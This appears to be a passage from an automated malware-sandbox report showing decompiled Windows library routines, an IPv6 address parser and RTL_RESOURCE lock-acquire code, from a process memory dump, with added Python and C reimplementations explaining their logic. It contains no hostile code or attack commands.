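The ___swprintf_l record earlier in this section carries the three embedded-IPv4 spellings of an IPv6 address (":%u.%u.%u.%u" after a prefix, "::ffff:0:%u.%u.%u.%u", and "ffff:" as the optional %hs), and the E02050B15 listing that follows is the matching text-to-address parser: at most 4 hex digits per group, at most 3 decimal digits per dotted octet, octets above 0xff rejected, one "::" gap closed by a memmove and zero-fill, a flag (_a7) that makes any '.' an error, and 0xC000000D returned on any violation. The Python below is an added example, not code from the report or from the sample; it reimplements that parser and formatter so the limits can be exercised on real input. Reading these two routines as ntdll's RtlIpv6StringToAddress / RtlIpv6AddressToString is an assumption, the function names are this example's own, and the conditions that select the three embedded-IPv4 spellings in the formatter are this example's choice rather than something the listing shows.

```python
import re

STATUS_SUCCESS = 0
STATUS_INVALID_PARAMETER = 0xC000000D   # the value E02050B15 returns on malformed input

_HEX_GROUP = re.compile(r"^[0-9A-Fa-f]{1,4}$")                                   # the '> 4' digit check
_DOTTED = re.compile(r"^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$")  # the '> 3' digit check


def _groups(part, tail_allowed, allow_ipv4):
    """Split one side of '::' into 16-bit groups. A dotted IPv4 tail counts as two
    groups and is only legal as the final piece. Returns None on any violation."""
    if part == "":
        return []
    out = []
    pieces = part.split(":")
    last = len(pieces) - 1
    for i, piece in enumerate(pieces):
        m = _DOTTED.match(piece)
        if m is not None:
            if not allow_ipv4 or not tail_allowed or i != last:
                return None
            octets = [int(x) for x in m.groups()]
            if max(octets) > 0xFF:                      # the '> 0xff' check
                return None
            out.append((octets[0] << 8) | octets[1])
            out.append((octets[2] << 8) | octets[3])
        elif _HEX_GROUP.match(piece):
            out.append(int(piece, 16))
        else:
            return None
    return out


def parse_ipv6(text, allow_ipv4_tail=True):
    """Return (status, 16 bytes). allow_ipv4_tail=False mirrors the _a7 flag,
    under which any '.' in the input is an error."""
    bad = (STATUS_INVALID_PARAMETER, b"")
    if text.count("::") > 1:                             # only one elision allowed
        return bad
    if "::" in text:
        left, right = text.split("::")
        lg = _groups(left, False, allow_ipv4_tail)
        rg = _groups(right, True, allow_ipv4_tail)
        if lg is None or rg is None or len(lg) + len(rg) > 7:
            return bad
        # the tail is moved to the end and the gap zero-filled (the memmove/memset pair)
        groups = lg + [0] * (8 - len(lg) - len(rg)) + rg
    else:
        groups = _groups(text, True, allow_ipv4_tail)
        if groups is None or len(groups) != 8:
            return bad
    return STATUS_SUCCESS, b"".join(g.to_bytes(2, "big") for g in groups)


def format_ipv6(addr):
    """Text form of a 16-byte address. The three embedded-IPv4 spellings follow the
    format strings in the ___swprintf_l record; the conditions selecting them are
    this example's choice. Everything else is RFC 5952 style (longest zero run as '::')."""
    if len(addr) != 16:
        raise ValueError("expected 16 bytes")
    g = [int.from_bytes(addr[i:i + 2], "big") for i in range(0, 16, 2)]
    v4 = "%u.%u.%u.%u" % tuple(addr[12:])
    if g[:5] == [0] * 5 and g[5] == 0xFFFF:
        return "::ffff:" + v4                           # IPv4-mapped, "::" + "ffff:" + dotted
    if g[:4] == [0] * 4 and g[4] == 0xFFFF and g[5] == 0:
        return "::ffff:0:" + v4                         # "::ffff:0:%u.%u.%u.%u"
    if g[:6] == [0] * 6 and not (g[6] == 0 and g[7] <= 1):
        return "::" + v4                                # IPv4-compatible, but never for :: or ::1
    best_start, best_len, i = -1, 0, 0
    while i < 8:                                        # locate the longest run of zero groups
        if g[i] != 0:
            i += 1
            continue
        j = i
        while j < 8 and g[j] == 0:
            j += 1
        if j - i > best_len:                            # strict: the first of two equal runs wins
            best_start, best_len = i, j - i
        i = j
    if best_len < 2:
        return ":".join("%x" % x for x in g)
    head = ":".join("%x" % x for x in g[:best_start])
    tail = ":".join("%x" % x for x in g[best_start + best_len:])
    return head + "::" + tail
```

The inputs that the decompiled checks reject (a five-digit group, a fourth octet of 256, a second "::", a dotted tail that is not last, seven groups with no "::") all come back as 0xC000000D here, and well-formed text round-trips through the formatter, which is the behaviour a detection or parsing layer should expect when it handles address strings the same way the library does.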

                                                              C-Code - Quality: 100%
                                                              			E02050B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				void* _t108;
                                                              				void* _t116;
                                                              				char _t120;
                                                              				short _t121;
                                                              				void* _t128;
                                                              				intOrPtr* _t130;
                                                              				char _t132;
                                                              				short _t133;
                                                              				intOrPtr _t141;
                                                              				signed int _t156;
                                                              				signed int _t174;
                                                              				intOrPtr _t177;
                                                              				intOrPtr* _t179;
                                                              				intOrPtr _t180;
                                                              				void* _t183;
                                                              
                                                              				_t179 = _a4;
                                                              				_t141 =  *_t179;
                                                              				_v16 = 0;
                                                              				_v28 = 0;
                                                              				_v8 = 0;
                                                              				_v24 = 0;
                                                              				_v12 = 0;
                                                              				_v32 = 0;
                                                              				_v20 = 0;
                                                              				if(_t141 == 0) {
                                                              					L41:
                                                              					 *_a8 = _t179;
                                                              					_t180 = _v24;
                                                              					if(_t180 != 0) {
                                                              						if(_t180 != 3) {
                                                              							goto L6;
                                                              						}
                                                              						_v8 = _v8 + 1;
                                                              					}
                                                              					_t174 = _v32;
                                                              					if(_t174 == 0) {
                                                              						if(_v8 == 7) {
                                                              							goto L43;
                                                              						}
                                                              						goto L6;
                                                              					}
                                                              					L43:
                                                              					if(_v16 != 1) {
                                                              						if(_v16 != 2) {
                                                              							goto L6;
                                                              						}
                                                              						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                              						L47:
                                                              						if(_t174 != 0) {
                                                              							E02028980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                              							_t116 = 8;
                                                              							E0201DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                              						}
                                                              						return 0;
                                                              					}
                                                              					if(_t180 != 0) {
                                                              						if(_v12 > 3) {
                                                              							goto L6;
                                                              						}
                                                              						_t120 = E02050CFA(_v28, 0, 0xa);
                                                              						_t183 = _t183 + 0xc;
                                                              						if(_t120 > 0xff) {
                                                              							goto L6;
                                                              						}
                                                              						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                              						goto L47;
                                                              					}
                                                              					if(_v12 > 4) {
                                                              						goto L6;
                                                              					}
                                                              					_t121 = E02050CFA(_v28, _t180, 0x10);
                                                              					_t183 = _t183 + 0xc;
                                                              					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                              					goto L47;
                                                              				} else {
                                                              					while(1) {
                                                              						_t123 = _v16;
                                                              						if(_t123 == 0) {
                                                              							goto L7;
                                                              						}
                                                              						_t108 = _t123 - 1;
                                                              						if(_t108 != 0) {
                                                              							goto L1;
                                                              						}
                                                              						_t178 = _t141;
                                                              						if(E020506BA(_t108, _t141) == 0 || _t135 == 0) {
                                                              							if(E020506BA(_t135, _t178) == 0 || E02050A5B(_t136, _t178) == 0) {
                                                              								if(_t141 != 0x3a) {
                                                              									if(_t141 == 0x2e) {
                                                              										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                              											goto L41;
                                                              										} else {
                                                              											_v24 = _v24 + 1;
                                                              											L27:
                                                              											_v16 = _v16 & 0x00000000;
                                                              											L28:
                                                              											if(_v28 == 0) {
                                                              												goto L20;
                                                              											}
                                                              											_t177 = _v24;
                                                              											if(_t177 != 0) {
                                                              												if(_v12 > 3) {
                                                              													L6:
                                                              													return 0xc000000d;
                                                              												}
                                                              												_t132 = E02050CFA(_v28, 0, 0xa);
                                                              												_t183 = _t183 + 0xc;
                                                              												if(_t132 > 0xff) {
                                                              													goto L6;
                                                              												}
                                                              												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                              												goto L20;
                                                              											}
                                                              											if(_v12 > 4) {
                                                              												goto L6;
                                                              											}
                                                              											_t133 = E02050CFA(_v28, 0, 0x10);
                                                              											_t183 = _t183 + 0xc;
                                                              											_v20 = _v20 + 1;
                                                              											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                              											goto L20;
                                                              										}
                                                              									}
                                                              									goto L41;
                                                              								}
                                                              								if(_v24 > 0 || _v8 > 6) {
                                                              									goto L41;
                                                              								} else {
                                                              									_t130 = _t179 + 1;
                                                              									if( *_t130 == _t141) {
                                                              										if(_v32 != 0) {
                                                              											goto L41;
                                                              										}
                                                              										_v32 = _v8 + 1;
                                                              										_t156 = 2;
                                                              										_v8 = _v8 + _t156;
                                                              										L34:
                                                              										_t179 = _t130;
                                                              										_v16 = _t156;
                                                              										goto L28;
                                                              									}
                                                              									_v8 = _v8 + 1;
                                                              									goto L27;
                                                              								}
                                                              							} else {
                                                              								_v12 = _v12 + 1;
                                                              								if(_v24 > 0) {
                                                              									goto L41;
                                                              								}
                                                              								_a7 = 1;
                                                              								goto L20;
                                                              							}
                                                              						} else {
                                                              							_v12 = _v12 + 1;
                                                              							L20:
                                                              							_t179 = _t179 + 1;
                                                              							_t141 =  *_t179;
                                                              							if(_t141 == 0) {
                                                              								goto L41;
                                                              							}
                                                              							continue;
                                                              						}
                                                              						L7:
                                                              						if(_t141 == 0x3a) {
                                                              							if(_v24 > 0 || _v8 > 0) {
                                                              								goto L41;
                                                              							} else {
                                                              								_t130 = _t179 + 1;
                                                              								if( *_t130 != _t141) {
                                                              									goto L41;
                                                              								}
                                                              								_v20 = _v20 + 1;
                                                              								_t156 = 2;
                                                              								_v32 = 1;
                                                              								_v8 = _t156;
                                                              								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                              								goto L34;
                                                              							}
                                                              						}
                                                              						L8:
                                                              						if(_v8 > 7) {
                                                              							goto L41;
                                                              						}
                                                              						_t142 = _t141;
                                                              						if(E020506BA(_t123, _t141) == 0 || _t124 == 0) {
                                                              							if(E020506BA(_t124, _t142) == 0 || E02050A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                              								goto L41;
                                                              							} else {
                                                              								_t128 = 1;
                                                              								_a7 = 1;
                                                              								_v28 = _t179;
                                                              								_v16 = 1;
                                                              								_v12 = 1;
                                                              								L39:
                                                              								if(_v16 == _t128) {
                                                              									goto L20;
                                                              								}
                                                              								goto L28;
                                                              							}
                                                              						} else {
                                                              							_a7 = 0;
                                                              							_v28 = _t179;
                                                              							_v16 = 1;
                                                              							_v12 = 1;
                                                              							goto L20;
                                                              						}
                                                              					}
                                                              				}
                                                              				L1:
                                                              				_t123 = _t108 == 1;
                                                              				if(_t108 == 1) {
                                                              					goto L8;
                                                              				}
                                                              				_t128 = 1;
                                                              				goto L39;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.686656983.0000000002000000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: true
                                                              • Associated: 00000007.00000002.686650959.0000000001FF0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686740727.00000000020E0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686747338.00000000020F0000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686753560.00000000020F4000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686759385.00000000020F7000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686765984.0000000002100000.00000040.00000001.sdmp
                                                              • Associated: 00000007.00000002.686816903.0000000002160000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID: .$:$:
                                                              • API String ID: 3965848254-2308638275
                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction ID: f01f02f70b863c509f7ab78ba7f7ba549171597fba48b5002b4255e202c7c373
                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction Fuzzy Hash: 93A17C71D0032AEADF65CF68C8447AFBBF6AF0A308F24846ADC42A7241D7319645EB55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 50%
                                                              			E02050554(signed int _a4, char _a8) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int* _t49;
                                                              				signed int _t51;
                                                              				signed int _t56;
                                                              				signed int _t58;
                                                              				signed int _t61;
                                                              				signed int _t63;
                                                              				void* _t66;
                                                              				intOrPtr _t67;
                                                              				void* _t69;
                                                              				signed int _t70;
                                                              				void* _t75;
                                                              				signed int _t81;
                                                              				signed int _t84;
                                                              				void* _t86;
                                                              				signed int _t93;
                                                              				signed int _t96;
                                                              				intOrPtr _t105;
                                                              				signed int _t107;
                                                              				void* _t110;
                                                              				signed int _t115;
                                                              				signed int* _t119;
                                                              				void* _t125;
                                                              				void* _t126;
                                                              				signed int _t128;
                                                              				signed int _t130;
                                                              				signed int _t138;
                                                              				signed int _t144;
                                                              				void* _t158;
                                                              				void* _t159;
                                                              				void* _t160;
                                                              
                                                              				_t96 = _a4;
                                                              				_t115 =  *(_t96 + 0x28);
                                                              				_push(_t138);
                                                              				if(_t115 < 0) {
                                                              					_t105 =  *[fs:0x18];
                                                              					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                              					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                              						goto L6;
                                                              					} else {
                                                              						__eflags = _t115 | 0xffffffff;
                                                              						asm("lock xadd [eax], edx");
                                                              						return 1;
                                                              					}
                                                              				} else {
                                                              					L6:
                                                              					_push(_t128);
                                                              					while(1) {
                                                              						L7:
                                                              						__eflags = _t115;
                                                              						if(_t115 >= 0) {
                                                              							break;
                                                              						}
                                                              						__eflags = _a8;
                                                              						if(_a8 == 0) {
                                                              							__eflags = 0;
                                                              							return 0;
                                                              						} else {
                                                              							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                              							_t49 = _t96 + 0x1c;
                                                              							_t106 = 1;
                                                              							asm("lock xadd [edx], ecx");
                                                              							_t115 =  *(_t96 + 0x28);
                                                              							__eflags = _t115;
                                                              							if(_t115 < 0) {
                                                              								L23:
                                                              								_t130 = 0;
                                                              								__eflags = 0;
                                                              								while(1) {
                                                              									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                              									asm("sbb esi, esi");
                                                              									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020f01c0;
                                                              									_push(_t144);
                                                              									_push(0);
                                                              									_t51 = E0200F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                              									__eflags = _t51 - 0x102;
                                                              									if(_t51 != 0x102) {
                                                              										break;
                                                              									}
                                                              									_t106 =  *(_t144 + 4);
                                                              									_t126 =  *_t144;
                                                              									_t86 = E02054FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                              									_push(_t126);
                                                              									_push(_t86);
                                                              									E02063F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                              									E02063F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                              									_t130 = _t130 + 1;
                                                              									_t160 = _t158 + 0x28;
                                                              									__eflags = _t130 - 2;
                                                              									if(__eflags > 0) {
                                                              										E0209217A(_t106, __eflags, _t96);
                                                              									}
                                                              									_push("RTL: Re-Waiting\n");
                                                              									_push(0);
                                                              									_push(0x65);
                                                              									E02063F92();
                                                              									_t158 = _t160 + 0xc;
                                                              								}
                                                              								__eflags = _t51;
                                                              								if(__eflags < 0) {
                                                              									_push(_t51);
                                                              									E02053915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                              									asm("int3");
                                                              									while(1) {
                                                              										L32:
                                                              										__eflags = _a8;
                                                              										if(_a8 == 0) {
                                                              											break;
                                                              										}
                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                              										_t119 = _t96 + 0x24;
                                                              										_t107 = 1;
                                                              										asm("lock xadd [eax], ecx");
                                                              										_t56 =  *(_t96 + 0x28);
                                                              										_a4 = _t56;
                                                              										__eflags = _t56;
                                                              										if(_t56 != 0) {
                                                              											L40:
                                                              											_t128 = 0;
                                                              											__eflags = 0;
                                                              											while(1) {
                                                              												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                              												asm("sbb esi, esi");
                                                              												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020f01c0;
                                                              												_push(_t138);
                                                              												_push(0);
                                                              												_t58 = E0200F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                              												__eflags = _t58 - 0x102;
                                                              												if(_t58 != 0x102) {
                                                              													break;
                                                              												}
                                                              												_t107 =  *(_t138 + 4);
                                                              												_t125 =  *_t138;
                                                              												_t75 = E02054FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                              												_push(_t125);
                                                              												_push(_t75);
                                                              												E02063F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                              												E02063F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                              												_t128 = _t128 + 1;
                                                              												_t159 = _t158 + 0x28;
                                                              												__eflags = _t128 - 2;
                                                              												if(__eflags > 0) {
                                                              													E0209217A(_t107, __eflags, _t96);
                                                              												}
                                                              												_push("RTL: Re-Waiting\n");
                                                              												_push(0);
                                                              												_push(0x65);
                                                              												E02063F92();
                                                              												_t158 = _t159 + 0xc;
                                                              											}
                                                              											__eflags = _t58;
                                                              											if(__eflags < 0) {
                                                              												_push(_t58);
                                                              												E02053915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                              												asm("int3");
                                                              												_t61 =  *_t107;
                                                              												 *_t107 = 0;
                                                              												__eflags = _t61;
                                                              												if(_t61 == 0) {
                                                              													L1:
                                                              													_t63 = E02035384(_t138 + 0x24);
                                                              													if(_t63 != 0) {
                                                              														goto L52;
                                                              													} else {
                                                              														goto L2;
                                                              													}
                                                              												} else {
                                                              													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                              													_push( &_a4);
                                                              													_push(_t61);
                                                              													_t70 = E0200F970( *((intOrPtr*)(_t138 + 0x18)));
                                                              													__eflags = _t70;
                                                              													if(__eflags >= 0) {
                                                              														goto L1;
                                                              													} else {
                                                              														_push(_t70);
                                                              														E02053915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                              														L52:
                                                              														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                              														_push( &_a4);
                                                              														_push(1);
                                                              														_t63 = E0200F970( *((intOrPtr*)(_t138 + 0x20)));
                                                              														__eflags = _t63;
                                                              														if(__eflags >= 0) {
                                                              															L2:
                                                              															return _t63;
                                                              														} else {
                                                              															_push(_t63);
                                                              															E02053915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                              															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                              															_push( &_a4);
                                                              															_push(1);
                                                              															_t63 = E0200F970( *((intOrPtr*)(_t138 + 0x20)));
                                                              															__eflags = _t63;
                                                              															if(__eflags >= 0) {
                                                              																goto L2;
                                                              															} else {
                                                              																_push(_t63);
                                                              																_t66 = E02053915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                              																asm("int3");
                                                              																while(1) {
                                                              																	_t110 = _t66;
                                                              																	__eflags = _t66 - 1;
                                                              																	if(_t66 != 1) {
                                                              																		break;
                                                              																	}
                                                              																	_t128 = _t128 | 0xffffffff;
                                                              																	_t66 = _t110;
                                                              																	asm("lock cmpxchg [ebx], edi");
                                                              																	__eflags = _t66 - _t110;
                                                              																	if(_t66 != _t110) {
                                                              																		continue;
                                                              																	} else {
                                                              																		_t67 =  *[fs:0x18];
                                                              																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                              																		return _t67;
                                                              																	}
                                                              																	goto L59;
                                                              																}
                                                              																E02035329(_t110, _t138);
                                                              																_t69 = E020353A5(_t138, 1);
                                                              																return _t69;
                                                              															}
                                                              														}
                                                              													}
                                                              												}
                                                              											} else {
                                                              												_t56 =  *(_t96 + 0x28);
                                                              												goto L3;
                                                              											}
                                                              										} else {
                                                              											_t107 =  *_t119;
                                                              											__eflags = _t107;
                                                              											if(__eflags > 0) {
                                                              												while(1) {
                                                              													_t81 = _t107;
                                                              													asm("lock cmpxchg [edi], esi");
                                                              													__eflags = _t81 - _t107;
                                                              													if(_t81 == _t107) {
                                                              														break;
                                                              													}
                                                              													_t107 = _t81;
                                                              													__eflags = _t81;
                                                              													if(_t81 > 0) {
                                                              														continue;
                                                              													}
                                                              													break;
                                                              												}
                                                              												_t56 = _a4;
                                                              												__eflags = _t107;
                                                              											}
                                                              											if(__eflags != 0) {
                                                              												while(1) {
                                                              													L3:
                                                              													__eflags = _t56;
                                                              													if(_t56 != 0) {
                                                              														goto L32;
                                                              													}
                                                              													_t107 = _t107 | 0xffffffff;
                                                              													_t56 = 0;
                                                              													asm("lock cmpxchg [edx], ecx");
                                                              													__eflags = 0;
                                                              													if(0 != 0) {
                                                              														continue;
                                                              													} else {
                                                              														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              														return 1;
                                                              													}
                                                              													goto L59;
                                                              												}
                                                              												continue;
                                                              											} else {
                                                              												goto L40;
                                                              											}
                                                              										}
                                                              										goto L59;
                                                              									}
                                                              									__eflags = 0;
                                                              									return 0;
                                                              								} else {
                                                              									_t115 =  *(_t96 + 0x28);
                                                              									continue;
                                                              								}
                                                              							} else {
                                                              								_t106 =  *_t49;
                                                              								__eflags = _t106;
                                                              								if(__eflags > 0) {
                                                              									while(1) {
                                                              										_t93 = _t106;
                                                              										asm("lock cmpxchg [edi], esi");
                                                              										__eflags = _t93 - _t106;
                                                              										if(_t93 == _t106) {
                                                              											break;
                                                              										}
                                                              										_t106 = _t93;
                                                              										__eflags = _t93;
                                                              										if(_t93 > 0) {
                                                              											continue;
                                                              										}
                                                              										break;
                                                              									}
                                                              									__eflags = _t106;
                                                              								}
                                                              								if(__eflags != 0) {
                                                              									continue;
                                                              								} else {
                                                              									goto L23;
                                                              								}
                                                              							}
                                                              						}
                                                              						goto L59;
                                                              					}
                                                              					_t84 = _t115;
                                                              					asm("lock cmpxchg [esi], ecx");
                                                              					__eflags = _t84 - _t115;
                                                              					if(_t84 != _t115) {
                                                              						_t115 = _t84;
                                                              						goto L7;
                                                              					} else {
                                                              						return 1;
                                                              					}
                                                              				}
                                                              				L59:
                                                              			}
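The format strings in the fragment above ("RTL: Acquire Shared Sem Timeout", "RTL: Acquire Exclusive Sem Timeout", "RTL: Resource at %p", "RTL: Re-Waiting") and the field accesses (+0x1c and +0x24 bumped with lock xadd while waiting, +0x28 updated with lock cmpxchg, +0x2c written from fs:[0x18]+0x24, bit 0 of +0x30 selecting the timeout, +0x34 pointing at a block whose +0x14 counter is incremented on contention) are those of ntdll's RTL_RESOURCE and its shared/exclusive acquire routines; the wait returning 0x102 is STATUS_TIMEOUT. For triage this means the decompiled function is library code rather than sample-specific logic. The block below is an added example, not code from the report or from ntdll: it re-implements in C11 only the lock-free fast path read from the decompilation, with try semantics (the `_a8 == 0` case, where the routine returns 0 instead of blocking on the semaphore), and adds simple release functions that the shown fragment does not contain. Field names follow the public RTL_RESOURCE layout; the thread id is passed in by the caller instead of being read from the TEB.

```c
/* Added example: fast path of the decompiled RTL_RESOURCE acquire routines,
 * re-implemented with C11 atomics. Not ntdll's code. Only NumberOfActive
 * (+0x28) and ExclusiveOwnerThread (+0x2c) are modelled; the semaphores and
 * waiter counters belong to the blocking slow path, which is left out. */
#include <stdatomic.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

typedef struct {
    atomic_long number_of_active;       /* +0x28: >0 shared holders, -1 exclusive, 0 free */
    uintptr_t   exclusive_owner_thread; /* +0x2c: TEB->ClientId.UniqueThread in ntdll */
} rw_resource;

#define RW_EXCLUSIVE (-1L)              /* the 0xffffffff OR'd into ecx/esi before cmpxchg */

void rw_resource_init(rw_resource *r) {
    atomic_init(&r->number_of_active, 0);
    r->exclusive_owner_thread = 0;
}

/* Loop L7 in the decompilation: read NumberOfActive, and while it is
 * non-negative try to CAS it to n+1. A negative value means an exclusive
 * owner holds the resource; with Wait == FALSE the routine returns 0. */
bool acquire_shared_try(rw_resource *r) {
    long n = atomic_load(&r->number_of_active);
    while (n >= 0) {
        /* on failure n is reloaded with the current value and we retry,
         * which is the `_t115 = _t84; goto L7` path */
        if (atomic_compare_exchange_weak(&r->number_of_active, &n, n + 1))
            return true;
    }
    return false;
}

/* Loop L3 in the decompilation: CAS NumberOfActive from 0 to -1, then
 * record the owning thread. Any non-zero value means the resource is held
 * (shared or exclusive), and the non-waiting caller gets 0. */
bool acquire_exclusive_try(rw_resource *r, uintptr_t thread_id) {
    long expected = 0;
    if (!atomic_compare_exchange_strong(&r->number_of_active, &expected, RW_EXCLUSIVE))
        return false;
    r->exclusive_owner_thread = thread_id;
    return true;
}

/* Release paths are not part of the shown fragment; these are the minimal
 * inverses needed to exercise the acquire logic. */
void release_shared(rw_resource *r) {
    atomic_fetch_sub(&r->number_of_active, 1);
}

void release_exclusive(rw_resource *r) {
    r->exclusive_owner_thread = 0;
    atomic_store(&r->number_of_active, 0);
}

long active_count(rw_resource *r) {
    return atomic_load(&r->number_of_active);
}

uintptr_t exclusive_owner(const rw_resource *r) {
    return r->exclusive_owner_thread;
}

int main(void) {
    rw_resource r;
    rw_resource_init(&r);
    printf("shared #1: %d\n", acquire_shared_try(&r));            /* 1 */
    printf("shared #2: %d\n", acquire_shared_try(&r));            /* 1 */
    printf("exclusive while shared: %d\n",
           acquire_exclusive_try(&r, 0x1234));                    /* 0 */
    release_shared(&r);
    release_shared(&r);
    printf("exclusive when free: %d\n",
           acquire_exclusive_try(&r, 0x1234));                    /* 1 */
    printf("shared while exclusive: %d\n", acquire_shared_try(&r)); /* 0 */
    printf("active = %ld, owner = %#lx\n",
           active_count(&r), (unsigned long)exclusive_owner(&r));
    release_exclusive(&r);
    return 0;
}
```

The example exercises the state machine the decompilation encodes in NumberOfActive: any number of shared holders raise it above zero, a single exclusive holder drives it to -1, and each acquire is a CAS from the observed value so two threads racing for the last slot cannot both succeed. What is deliberately missing is everything after the `_a8 == 0` check: the waiter counters, the semaphore wait with the timeout pointer, the contention-count bump in DebugInfo and the "RTL: Re-Waiting" loop, all of which only matter once a caller is willing to block.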

[Instruction address column from the report's decompilation view, collapsed: the listed addresses fall in 0x0205055a-0x020505f3, 0x0207217f-0x0207237a and 0x02035367-0x02035372, with 0x00000000 entries for decompiled lines that have no address.]
                                                              0x0207237f
                                                              0x0207237f
                                                              0x02072385
                                                              0x02072386
                                                              0x02072389
                                                              0x0207238e
                                                              0x02072390
                                                              0x02035378
                                                              0x0203537c
                                                              0x02072396
                                                              0x02072396
                                                              0x02072397
                                                              0x0207239c
                                                              0x020723a2
                                                              0x020723a3
                                                              0x020723a6
                                                              0x020723ab
                                                              0x020723ad
                                                              0x00000000
                                                              0x020723b3
                                                              0x020723b3
                                                              0x020723b4
                                                              0x020723b9
                                                              0x020723ba
                                                              0x020723ba
                                                              0x020723bc
                                                              0x020723bf
                                                              0x00000000
                                                              0x00000000
                                                              0x02069153
                                                              0x02069158
                                                              0x0206915a
                                                              0x0206915e
                                                              0x02069160
                                                              0x00000000
                                                              0x02069166
                                                              0x02069166
                                                              0x02069171
                                                              0x02069176
                                                              0x02069176
                                                              0x00000000
                                                              0x02069160
                                                              0x020723c6
                                                              0x020723ce
                                                              0x020723d7
                                                              0x020723d7
                                                              0x020723ad
                                                              0x02072390
                                                              0x02072373
                                                              0x0207233f
                                                              0x0207233f
                                                              0x00000000
                                                              0x0207233f
                                                              0x02072291
                                                              0x02072291
                                                              0x02072293
                                                              0x02072295
                                                              0x0207229a
                                                              0x020722a1
                                                              0x020722a3
                                                              0x020722a7
                                                              0x020722a9
                                                              0x00000000
                                                              0x00000000
                                                              0x020722ab
                                                              0x020722ad
                                                              0x020722af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x020722af
                                                              0x020722b1
                                                              0x020722b4
                                                              0x020722b4
                                                              0x020722b6
                                                              0x020353be
                                                              0x020353be
                                                              0x020353be
                                                              0x020353c0
                                                              0x00000000
                                                              0x00000000
                                                              0x020353cb
                                                              0x020353ce
                                                              0x020353d0
                                                              0x020353d4
                                                              0x020353d6
                                                              0x00000000
                                                              0x020353d8
                                                              0x020353e3
                                                              0x020353ea
                                                              0x020353ea
                                                              0x00000000
                                                              0x020353d6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x020722b6
                                                              0x00000000
                                                              0x0207228f
                                                              0x02072349
                                                              0x0207234d
                                                              0x02072251
                                                              0x02072251
                                                              0x00000000
                                                              0x02072251
                                                              0x020721a4
                                                              0x020721a4
                                                              0x020721a6
                                                              0x020721a8
                                                              0x020721ac
                                                              0x020721b6
                                                              0x020721b8
                                                              0x020721bc
                                                              0x020721be
                                                              0x00000000
                                                              0x00000000
                                                              0x020721c0
                                                              0x020721c2
                                                              0x020721c4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x020721c4
                                                              0x020721c6
                                                              0x020721c6
                                                              0x020721c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x020721c8
                                                              0x020721a2
                                                              0x00000000
                                                              0x02072183
                                                              0x0205057b
                                                              0x0205057d
